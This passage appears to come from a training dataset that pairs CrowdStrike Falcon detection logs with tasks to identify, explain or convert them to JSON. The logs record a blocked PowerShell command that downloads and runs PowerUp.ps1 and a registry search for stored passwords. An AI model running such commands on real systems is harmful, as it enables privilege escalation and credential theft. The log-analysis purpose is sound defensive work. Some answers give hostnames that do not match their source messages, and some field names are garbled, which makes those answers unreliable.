Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: N/A filename: powershell.exe filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T16:44:43Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 233.87.19.2 userName: bob
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf", "filename": "reg.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-09T17:22:37Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"reg query HKLM /f password /t REG_SZ /s\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-3008783154-4189408168-2363429128-1618\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\"parent_md5\":\"911d039e71583a07320b32bde22f8e22\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mumbrellaine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-09T17:22:37Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "64.176.135.121", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf filename: reg.exe filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-09T17:22:37Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 64.176.135.121 userName: alice
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf", "filename": "reg.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-09T17:22:37Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"reg query HKLM /f password /t REG_SZ /s\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"fish\",\"user_id\":\"S-1-5-21-3008783154-4189408168-2363429128-1618\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\"parent_md5\":\"911d039e71583a07320b32bde22f8e22\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-09T17:22:37Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "156.27.51.231", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" 